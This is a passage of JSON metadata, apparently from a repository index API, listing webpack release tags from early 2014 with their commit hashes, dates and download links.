deload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"p